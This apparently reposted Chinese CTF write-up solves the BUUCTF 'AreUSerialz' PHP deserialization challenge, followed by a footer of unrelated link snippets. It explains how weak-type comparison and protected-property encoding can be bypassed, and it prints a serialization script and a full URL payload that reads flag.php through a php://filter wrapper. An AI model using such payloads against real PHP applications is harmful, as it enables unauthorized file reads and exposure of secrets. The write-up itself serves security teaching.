HelloYo1
HelloYo1

buuctf - [网鼎杯 2020 青龙组]AreUSerialz

1.题目源码



include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: 
";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

这是一个PHP反序列化的题目,首先看到需要传入一个’str’,而且通过is_valid()规定了传入的每一个字符的ASCII码的范围必须在32到125之间,然后对这个’str’进行反序列化操作。

在反序列化中,先调用__destruct()析构方法:

function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

从__destruct()代码中可以看到,如果op === “2”,那么op会被赋值为"1",然后content会赋值为空,并执行process函数,这里 if 中的判断语句用的是强类型比较。
然后看看process函数:

public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

代码内容为:如果op == “1”,执行write()函数;如果op ==“2”,执行read函数,同时将结果赋值给$res,然后输出;否则将输出"Bad Hacker!"。

这里 if 语句中的判断语句用的是弱类型的比较,那么只要op=2,这个是int整数型的2,那么op === “2” 则为False, op == "2"则为True,就可以进入read函数。

再看看read函数:

private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

在read函数中,使用filename调用file_get_contents函数将文件内容赋值给$res输出。

这里的filename是我们可控的,那么可以用前不久学的php://filter伪协议读取文件。然后使用output函数输出。

private function output($s) {
        echo "[Result]: 
";
        echo $s;
    }

那么现在整个反序列过程就清楚了:
1.将op = 2
2.filename = "php://filter/read=convert.base64-encode/resource=flag.php"


class FileHandler {

    protected $op=2;
    protected $filename="php://filter/read=convert.base64-encode/resource=flag.php";
    protected $content;

}

$a = new FileHandler();
echo serialize($a);
?>

得到结果是这样的,发现有三个地方显示不了。

在这里插入图片描述
原因是在于 $op $filename $content三个变量权限都是protected,而protected权限的变量在序列化时会有%00*%00字符,%00字符的ASCII码为0,不在is_valid函数规定的32到125的范围内。
可以使用一种简单的办法绕过:因为php7.1+版本对属性类型不敏感,本地序列化的时候将属性改为public就可以了。
buuctf - [网鼎杯 2020 青龙组]AreUSerialz_第1张图片
那么现在就可以使用这个payload来读取flag:

http://538f4844-0f4a-4d26-b0db-57f2416549f2.node3.buuoj.cn/?str=O:11:%22FileHandler%22:3:{s:2:%22op%22;i:2;s:8:%22filename%22;s:57:%22php://filter/read=convert.base64-encode/resource=flag.php%22;s:7:%22content%22;N;}

在这里插入图片描述
再将结果进行base64解码即可得到flag:
在这里插入图片描述

总结:
1.区分强类型比较和弱类型比较进行绕过
2.加深对php序列化和反序列化过程的理解

php序列化与反序列化方法:

  1. __construct 当一个对象创建时被调用
  2. __destruct 当一个对象销毁时被调用
  3. __toString 当一个对象被当作一个字符串使用
  4. __sleep 在对象被序列化之前运行
  5. __wakeup 在对象被反序列化之后被调用

参考:
https://www.freebuf.com/articles/web/209975.html
https://www.cnblogs.com/tr1ple/p/11156279.html

你可能感兴趣的:(CTF)

  • 网络安全从零开始学习CTF——CTF基本概念 Hacker_Oldv web安全学习安全
    这一系列把自己学习的CTF的过程详细写出来,方便大家学习时可以参考。一、CTF简介01」简介中文一般译作夺旗赛(对大部分新手也可以叫签到赛),在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。02」竞赛模式解题模式:在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参
  • CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp 2401_84281698 程序员网络安全学习面试
    给大家的福利零基础入门对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:因篇幅有限,仅展示部分资料网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化资料的朋友,可以点击这里获取一个人可以走的很
  • Vue和React的区别 挨踢女孩y vue.jsreact.jsjavascript前端csswebpackecmascript
    组件开发方式:Vue使用单文件组件(SFC),HTML,JS和CSS在一个文件内实现exportdefault{//JavaScript代码}.my-component{/*CSS样式*/}React使用JSX和JavaScriptimportReactfrom'react';import'./MyComponent.css';functionMyComponent(){return({/*JSX
  • 自学黑客(网络安全),一般人我劝你还是算了吧 网安周星星 web安全安全windows网络网络安全
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包文章讲述了自学网络安全时常见的误区,如先学编程、过度追求深度学习以及收集过多资料,并提供了前期学习的硬件、软件选择建议,强调了基础编程知识和英文能力的重要性。文中给出了详细的学习路线,包括基础操作入门、实战操作以及参加CTF和HVV等竞赛来提升技能,并推荐了一系列相关书籍和学习资源。一、自学网络安全学习的误区和陷阱1.不要试图先成为一
  • 新手必看——ctf六大题型介绍及六大题型解析&举例解题 沛哥网络安全 web安全学习安全udp网络协议
    CTF(CaptureTheFlag)介绍与六大题型解析一、什么是CTF?CTF(CaptureTheFlag),意为“夺旗赛”,是一种信息安全竞赛形式,广泛应用于网络安全领域。CTF竞赛通过模拟现实中的网络安全攻防战,让参赛者以攻防对抗的形式,利用各种信息安全技术进行解决一系列安全问题,最终获得“旗帜(Flag)”来获得积分。CTF赛事一般分为两种形式:Jeopardy(解题模式):参赛者通过解
  • Spring中ObjectProvider的使用与实例解析 t0_54manong springjava后端个人开发
    在Spring框架的不断演进中,ObjectProvider的引入为依赖注入提供了更灵活的解决方案。自SpringFramework4.3起,ObjectProvider扩展了原有的ObjectFactory接口,并在后续版本中不断完善。本文将通过实例详细介绍ObjectProvider的使用方法及其优势。一、ObjectProvider的获取方式ObjectProvider实例可以通过依赖注入或
  • CTF-WEB: 利用iframe标签利用xss,waf过滤后再转换漏洞-- N1ctf Junior display A5rZ 网络安全
    核心逻辑//获取URL查询参数的值functiongetQueryParam(param){//使用URLSearchParams从URL查询字符串中提取参数consturlParams=newURLSearchParams(window.location.search);//返回查询参数的值returnurlParams.get(param);}//使用DOMPurify对内容进行清理(sani
  • CTFHub技能树web——XSS——DOM反射 A 八方 CTFhub技能树——Webxss前端
    根据框里的内容直接右键查看网页源代码看到了其闭合方式然后去网页测试一下alert(1)反射';alert(1)看到确实存在去xssaq.cn创建一个项目把src粘过来在第一个输入框中再将返回回来的url复制粘贴到第二个输入框中';
  • CTF-WEB: 利用Web消息造成DOM XSS A5rZ xss网络安全
    如果索引中有类似如下代码window.addEventListener('message',function(e){document.getElementById('ads').innerHTML=e.data;});这行代码的作用是将接收到的消息内容(e.data)设置为id为'ads'的元素的HTML内容那么在受害者段执行如下代码会导致DOM污染','*')">参考实验:使用Web消息的DOM
  • Qt Pro、Pri、Prf 川谷_ qt开发语言
    一、概述1、在Qt中,通常使用.pro(project)、pri(privateinclude)、prf(projectfile)三种文件扩展名来组织项目。对于模块化编程,Qt提供了Pro和Pri,Pro管理项目,Pri管理模块。2、pro文件是Qt项目的核心文件,包含了项目的所有编译信息,用于定义项目的源代码、包含路径、编译器选型、链接库等等。一个pro文件就是一个Qt项目,构建这个项目只需要执
  • React中定义和使用函数式组件 开发小途 react.js前端
    在React中,函数式组件是一种通过普通JavaScript函数定义的组件。它们接收props作为参数,并返回React元素。从React16.8开始,函数式组件还可以利用Hooks来增加状态和其他React特性。1.简单的函数式组件importReactfrom'react';constHelloWorld=(props)=>{return(Hello,{props.name}!);};expo
  • aspectFill(填充目标区域的同时保持图像的原有宽高比 (aspect ratio)图像不会被拉伸或压缩变形 小丁学Java 微信小程序WxMa微信小程序
    “aspectFill”是一个常用于图像和视频处理的术语,尤其是在用户界面(UI)设计和图形编程领域。它描述的是一种图像缩放或调整大小的方式,旨在填充目标区域的同时保持图像的原有宽高比(aspectratio)。更详细的解释:AspectRatio(宽高比):指的是图像的宽度与高度的比例。例如,一个16:9的图像,宽度是高度的16/9倍。保持宽高比意味着在缩放或调整大小的过程中,原始的宽度和高度的
  • 3dgs 2025 学习笔记 AI算法网奇 3d渲染学习笔记
    CVPR20243D方向总汇包含(3DGS、三维重建、深度补全、深度估计、全景定位、表面重建和特征匹配等)_cvpr2024-structure-awaresparse-viewx-ray3dreconstr-CSDN博客https://github.com/apple/ml-hugs3DGSCOLMAP-Free3DGaussianSplatting⭐codeprojectFeature3DGS
  • CTFHub |文件上传 (无验证, 前端验证, .haccess绕过, MIME绕过, 00截断, 双写后缀, 文件头检查) Coding Happily CTF网络安全安全
    CTFHub|文件上传无验证使用工具:中国剑蚁(D:\AntSword_Loader\AntSword-Loader-v4.0.3-win32-x64\AntSword.exe)在下载这个工具的时候,浏览器拦截说有病毒。使用gitclone下载。十分丝滑。先上传文件a.php页面回显文件被放在:/load/a.php中打开中国剑蚁,右键添加数据,输入url(http://xxx.com/load/
  • BUUCTF——[极客大挑战 2019]PHP south_1 webphpphp
    打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码username=$username;$this->password=$password;}function__wakeup(){$this->username='guest';}function__destruct(){if
  • 【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 网安詹姆斯 安全web安全网络CTF网络安大赛
    【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了!基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、S
  • python doc_python中的_doc_是什么 weixin_39735288 pythondoc
    文档字符串。注意,是__doc__,前后各两个下划线。一般而言,是对函数/方法/模块所实现功能的简单描述。但当指向具体对象时,会显示此对象从属的类型的的文档字符串。(示例见以下a.__doc__)>>>str.__doc__"str(string[,encoding[,errors]])->str\n\nCreateanewstringobjectfromthegivenencodedstring
  • 解决:libssl.so.10: cannot open shared object file: No such file or directory 铭147 bert人工智能深度学习
    RuntimeError:Failedtoimporttransformers.models.bertbecauseofthefollowingerror(lookuptoseeitstraceback):libssl.so.10:cannotopensharedobjectfile:Nosuchfileordirectory遇到上面的这种错误不要急着去修改系统文件,很大可能是引用的包有问题!像这
  • ×× error while loading shared libraries ×× 上上签i Bug遭遇解决记录linuxlinux运维服务器
    ××:errorwhileloadingsharedlibraries:××.so.19:cannotopensharedobjectfile:Nosuchfileordirectory启动某些程序时,对应的链接库找不到解决方案[root@feng1build]#ttyd--helpttyd:errorwhileloadingsharedlibraries:libwebsockets.so.19:
  • Centos7 ImportError: libssl.so.3: cannot open shared object file: No such file or directory waketzheng 服务器
    Centos7系统的云服务器,安装好Python3.11.9后,执行python3.11-c"import_ssl"时,报错如下:ImportError:libssl.so.3:cannotopensharedobjectfile:NosuchfileordirectoryImportError:libcrypto.so.3:cannotopensharedobjectfile:Nosuchfil
  • libssl.so.10: cannot open shared object file: No such file or directory jerry.qin linux
    libssl.so.10:cannotopensharedobjectfile:Nosuchfileordirectory解决办法:先下载安装一次openssl下载:https://www.openssl.org/source/old/1.0.1/openssl-1.0.1e.tar.gz执行./configsharedzlib-dynamic来生成Makefile文件。通过make来生成生成li
  • React 条件判断 weixin58692541 系统react.jsjavascript前端
    在React中,可以通过JavaScript的条件语句来动态渲染组件或元素。以下是几种常用的在React中处理条件渲染的方法:1.使用if语句在render方法或函数组件的返回值中使用if语句来决定渲染内容。实例importReactfrom'react';importReactDOMfrom'react-dom/client';classMyComponentextendsReact.Compo
  • 【前端】【面试】【经典一道题】前端 Vue、React 采用单向数据流的原因 患得患失949 面试考题专栏(前后端)前端vue.jsreact.js面试
    前端Vue、React采用单向数据流的原因一、可预测性1.数据流向清晰在单向数据流架构里,数据从父组件流向子组件的路径是明确且可预期的。React示例:父组件通过props传递数据给子组件,子组件只能读取props中的数据,没有直接修改的权限。例如://父组件importReactfrom'react';importChildComponentfrom'./ChildComponent';cons
  • ctf网络安全大赛奖金,零基础入门到精通,收藏这一篇就够了 网安导师小李 网络安全编程程序员web安全安全网络学习sqlpythonjava
    根据最新的信息,2024年CTF网络安全大赛的奖金情况如下:GoogleCTF总奖金池超过32,000美元。前8支队伍将有机会参加在西班牙马拉加举行的hackceler8比赛,这是escal8活动的一部分。SASCTF冠军团队Bushwhackers获得了10,000美元的奖金。亚军p1gsekai(国际队)和季军c4tbuts4d(俄罗斯队)分别获得了5,000美元和3,000美元的奖金。这些信
  • 【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了! 网安詹姆斯 web安全CTF网络安全大赛pythonlinux
    【2025年】全国CTF夺旗赛-从零基础入门到竞赛,看这一篇就稳了!基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包目录一、CTF简介二、CTF竞赛模式三、CTF各大题型简介四、CTF学习路线4.1、初期1、html+css+js(2-3天)2、apache+php(4-5天)3、mysql(2-3天)4、python(2-3天)5、burpsuite(1-2天)4.2、中期1、S
  • 23种设计模式的定义和应用场景-C#代码-汇总 Zhen (Evan) Wang 设计模式
    23种设计模式的定义和应用场景:1.创建型模式(共5种)单例模式(Singleton)、工厂方法模式(FactoryMethod)、抽象工厂模式(AbstractFactory)、建造者模式(Builder)、原型模式(Prototype)2.结构型模式(共7种)适配器模式(Adapter)、桥接模式(Bridge)、组合模式(Composite)、装饰器模式(Decorator)、外观模式(Fa
  • Flink_CEP关于订单超时事件处理 weixin_43003792 Flink
    packagecomimportjava.utilimportorg.apache.flink.cep.{PatternSelectFunction,PatternTimeoutFunction}importorg.apache.flink.cep.scala.{CEP,PatternStream}importorg.apache.flink.cep.scala.pattern.Patternim
  • BUUCTF Crypto题目记录 Vigorousy 密码学
    MD5e00cf25ad42683b3df678c61f42c6bda进行MD5加密flag{admin1}Url编码%66%6c%61%67%7b%61%6e%64%20%31%3d%31%7dflag{and1=1}看我回旋踢synt{5pq1004q-86n5-46q8-o720-oro5on0417r1}观察已知字符串已经存在flag雏形,猜测为凯撒密码flag{5cd1004d-86a5
  • RoarCTF2019 Calc lunan0320 CTFWebphp正则表达式web
    RoarCTF2019Calc一、知识点1.1PHP的字符串解析特性这是别人对PHP字符串解析漏洞的理解,我们知道PHP将查询字符串(在URL或正文中)转换为内部GET或的关联数组_GET或的关联数组
  • C++:23种设计模式 月咏倾江华 设计模式
    本文将介绍编程中的23种设计模式,用C++语言编写。文章目录一、前言二、正文创建型模式1.单例模式(Singleton)2.工厂方法模式(FactoryMethod)3.抽象工厂模式(AbstractFactory)4.建造者模式(Builder)5.原型模式(Prototype)结构型模式6.适配器模式(Adapter)7.桥接模式(Bridge)8.组合模式(Composite)9.装饰模式(
  • html 周华华 html
    js 1,数组的排列 var arr=[1,4,234,43,52,]; for(var x=0;x<arr.length;x++){    for(var y=x-1;y<arr.length;y++){      if(arr[x]<arr[y]){     &
  • 【Struts2 四】Struts2拦截器 bit1129 struts2拦截器
    Struts2框架是基于拦截器实现的,可以对某个Action进行拦截,然后某些逻辑处理,拦截器相当于AOP里面的环绕通知,即在Action方法的执行之前和之后根据需要添加相应的逻辑。事实上,即使struts.xml没有任何关于拦截器的配置,Struts2也会为我们添加一组默认的拦截器,最常见的是,请求参数自动绑定到Action对应的字段上。   Struts2中自定义拦截器的步骤是:
  • make:cc 命令未找到解决方法 daizj linux命令未知make cc
    安装rz sz程序时,报下面错误:   [root@slave2 src]# make posix cc   -O -DPOSIX -DMD=2 rz.c -o rz make: cc:命令未找到 make: *** [posix] 错误 127   系统:centos 6.6 环境:虚拟机   错误原因:系统未安装gcc,这个是由于在安
  • Oracle之Job应用 周凡杨 oracle job
    最近写服务,服务上线后,需要写一个定时执行的SQL脚本,清理并更新数据库表里的数据,应用到了Oracle 的 Job的相关知识。在此总结一下。   一:查看相关job信息    1、相关视图  dba_jobs  all_jobs  user_jobs  dba_jobs_running 包含正在运行
  • 多线程机制 朱辉辉33 多线程
    转至http://blog.csdn.net/lj70024/archive/2010/04/06/5455790.aspx 程序、进程和线程: 程序是一段静态的代码,它是应用程序执行的蓝本。进程是程序的一次动态执行过程,它对应了从代码加载、执行至执行完毕的一个完整过程,这个过程也是进程本身从产生、发展至消亡的过程。线程是比进程更小的单位,一个进程执行过程中可以产生多个线程,每个线程有自身的
  • web报表工具FineReport使用中遇到的常见报错及解决办法(一) 老A不折腾 web报表finereportjava报表报表工具
    FineReport使用中遇到的常见报错及解决办法(一) 这里写点抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。   出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。   1、address pool is full: 含义:地址池满,连接数超过并发数上
  • mysql rpm安装后没有my.cnf 林鹤霄 没有my.cnf
    Linux下用rpm包安装的MySQL是不会安装/etc/my.cnf文件的, 至于为什么没有这个文件而MySQL却也能正常启动和作用,在这儿有两个说法, 第一种说法,my.cnf只是MySQL启动时的一个参数文件,可以没有它,这时MySQL会用内置的默认参数启动, 第二种说法,MySQL在启动时自动使用/usr/share/mysql目录下的my-medium.cnf文件,这种说法仅限于r
  • Kindle Fire HDX root并安装谷歌服务框架之后仍无法登陆谷歌账号的问题 aigo root
    原文:http://kindlefireforkid.com/how-to-setup-a-google-account-on-amazon-fire-tablet/   Step 4: Run ADB command from your PC   On the PC, you need install Amazon Fire ADB driver and instal
  • javascript 中var提升的典型实例 alxw4616 JavaScript
    // 刚刚在书上看到的一个小问题,很有意思.大家一起思考下吧 myname = 'global'; var fn = function () { console.log(myname); // undefined var myname = 'local'; console.log(myname); // local }; fn() // 上述代码实际上等同于以下代码 m
  • 定时器和获取时间的使用 百合不是茶 时间的转换定时器
    定时器:定时创建任务在游戏设计的时候用的比较多   Timer();定时器 TImerTask();Timer的子类  由 Timer 安排为一次执行或重复执行的任务。       定时器类Timer在java.util包中。使用时,先实例化,然后使用实例的schedule(TimerTask task, long delay)方法,设定
  • JDK1.5 Queue bijian1013 javathreadjava多线程Queue
    JDK1.5 Queue LinkedList: LinkedList不是同步的。如果多个线程同时访问列表,而其中至少一个线程从结构上修改了该列表,则它必须 保持外部同步。(结构修改指添加或删除一个或多个元素的任何操作;仅设置元素的值不是结构修改。)这一般通过对自然封装该列表的对象进行同步操作来完成。如果不存在这样的对象,则应该使用 Collections.synchronizedList 方
  • http认证原理和https bijian1013 httphttps
    一.基础介绍         在URL前加https://前缀表明是用SSL加密的。 你的电脑与服务器之间收发的信息传输将更加安全。         Web服务器启用SSL需要获得一个服务器证书并将该证书与要使用SSL的服务器绑定。 http和https使用的是完全不同的连接方式,用的端口也不一样,前者是80,后
  • 【Java范型五】范型继承 bit1129 java
    定义如下一个抽象的范型类,其中定义了两个范型参数,T1,T2   package com.tom.lang.generics; public abstract class SuperGenerics<T1, T2> { private T1 t1; private T2 t2; public abstract void doIt(T
  • 【Nginx六】nginx.conf常用指令(Directive) bit1129 Directive
    1. worker_processes    8; 表示Nginx将启动8个工作者进程,通过ps -ef|grep nginx,会发现有8个Nginx Worker Process在运行   nobody 53879 118449 0 Apr22 ? 00:26:15 nginx: worker process
  • lua 遍历Header头部 ronin47 lua header 遍历 
    local headers = ngx.req.get_headers()   ngx.say("headers begin", "<br/>")   ngx.say("Host : ", he
  • java-32.通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小(两数组的差最小)。 bylijinnan java
    import java.util.Arrays; public class MinSumASumB { /** * Q32.有两个序列a,b,大小都为n,序列元素的值任意整数,无序. * * 要求:通过交换a,b中的元素,使[序列a元素的和]与[序列b元素的和]之间的差最小。 * 例如: * int[] a = {100,99,98,1,2,3
  • redis 开窍的石头 redis
    在redis的redis.conf配置文件中找到# requirepass foobared 把它替换成requirepass 12356789 后边的12356789就是你的密码 打开redis客户端输入config get requirepass 返回 redis 127.0.0.1:6379> config get requirepass 1) "require
  • [JAVA图像与图形]现有的GPU架构支持JAVA语言吗? comsci java语言
          无论是opengl还是cuda,都是建立在C语言体系架构基础上的,在未来,图像图形处理业务快速发展,相关领域市场不断扩大的情况下,我们JAVA语言系统怎么从这么庞大,且还在不断扩大的市场上分到一块蛋糕,是值得每个JAVAER认真思考和行动的事情       
  • 安装ubuntu14.04登录后花屏了怎么办 cuiyadll ubuntu
    这个情况,一般属于显卡驱动问题。 可以先尝试安装显卡的官方闭源驱动。 按键盘三个键:CTRL + ALT  +  F1 进入终端,输入用户名和密码登录终端: 安装amd的显卡驱动 sudo  apt-get  install  fglrx 安装nvidia显卡驱动 sudo  ap
  • SSL 与 数字证书 的基本概念和工作原理 darrenzhu 加密ssl证书密钥签名
    SSL 与 数字证书 的基本概念和工作原理 http://www.linuxde.net/2012/03/8301.html SSL握手协议的目的是或最终结果是让客户端和服务器拥有一个共同的密钥,握手协议本身是基于非对称加密机制的,之后就使用共同的密钥基于对称加密机制进行信息交换。 http://www.ibm.com/developerworks/cn/webspher
  • Ubuntu设置ip的步骤 dcj3sjt126com ubuntu
    在单位的一台机器完全装了Ubuntu Server,但回家只能在XP上VM一个,装的时候网卡是DHCP的,用ifconfig查了一下ip是192.168.92.128,可以ping通。 转载不是错: Ubuntu命令行修改网络配置方法 /etc/network/interfaces打开后里面可设置DHCP或手动设置静态ip。前面auto eth0,让网卡开机自动挂载. 1. 以D
  • php包管理工具推荐 dcj3sjt126com PHPComposer
    http://www.phpcomposer.com/   Composer是 PHP 用来管理依赖(dependency)关系的工具。你可以在自己的项目中声明所依赖的外部工具库(libraries),Composer 会帮你安装这些依赖的库文件。 中文文档  入门指南  下载  安装包列表 Composer 中国镜像
  • Gson使用四(TypeAdapter) eksliang jsongsonGson自定义转换器gsonTypeAdapter
    转载请出自出处:http://eksliang.iteye.com/blog/2175595 一.概述        Gson的TypeAapter可以理解成自定义序列化和返序列化 二、应用场景举例        例如我们通常去注册时(那些外国网站),会让我们输入firstName,lastName,但是转到我们都
  • JQM控件之Navbar和Tabs gundumw100 htmlxmlcss
    在JQM中使用导航栏Navbar是简单的。 只需要将data-role="navbar"赋给div即可: <div data-role="navbar"> <ul> <li><a href="#" class="ui-btn-active&qu
  • 利用归并排序算法对大文件进行排序 iwindyforest java归并排序大文件分治法Merge sort
      归并排序算法介绍,请参照Wikipeida zh.wikipedia.org/wiki/%E5%BD%92%E5%B9%B6%E6%8E%92%E5%BA%8F 基本思想: 大文件分割成行数相等的两个子文件,递归(归并排序)两个子文件,直到递归到分割成的子文件低于限制行数 低于限制行数的子文件直接排序 两个排序好的子文件归并到父文件 直到最后所有排序好的父文件归并到输入
  • iOS UIWebView URL拦截 啸笑天 UIWebView
    本文译者:candeladiao,原文:URL filtering for UIWebView on the iPhone说明:译者在做app开发时,因为页面的javascript文件比较大导致加载速度很慢,所以想把javascript文件打包在app里,当UIWebView需要加载该脚本时就从app本地读取,但UIWebView并不支持加载本地资源。最后从下文中找到了解决方法,第一次翻译,难免有
  • 索引的碎片整理SQL语句 macroli sql
    SET NOCOUNT ON DECLARE @tablename VARCHAR (128) DECLARE @execstr VARCHAR (255) DECLARE @objectid INT DECLARE @indexid INT DECLARE @frag DECIMAL DECLARE @maxfrag DECIMAL --设置最大允许的碎片数量,超过则对索引进行碎片
  • Angularjs同步操作http请求with $promise qiaolevip 每天进步一点点学习永无止境AngularJS纵观千象
    // Define a factory app.factory('profilePromise', ['$q', 'AccountService', function($q, AccountService) { var deferred = $q.defer(); AccountService.getProfile().then(function(res) {
  • hibernate联合查询问题 sxj19881213 sqlHibernateHQL联合查询
    最近在用hibernate做项目,遇到了联合查询的问题,以及联合查询中的N+1问题。 针对无外键关联的联合查询,我做了HQL和SQL的实验,希望能帮助到大家。(我使用的版本是hibernate3.3.2)   1 几个常识:  (1)hql中的几种join查询,只有在外键关联、并且作了相应配置时才能使用。  (2)hql的默认查询策略,在进行联合查询时,会产
  • struts2.xml wuai struts
    <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他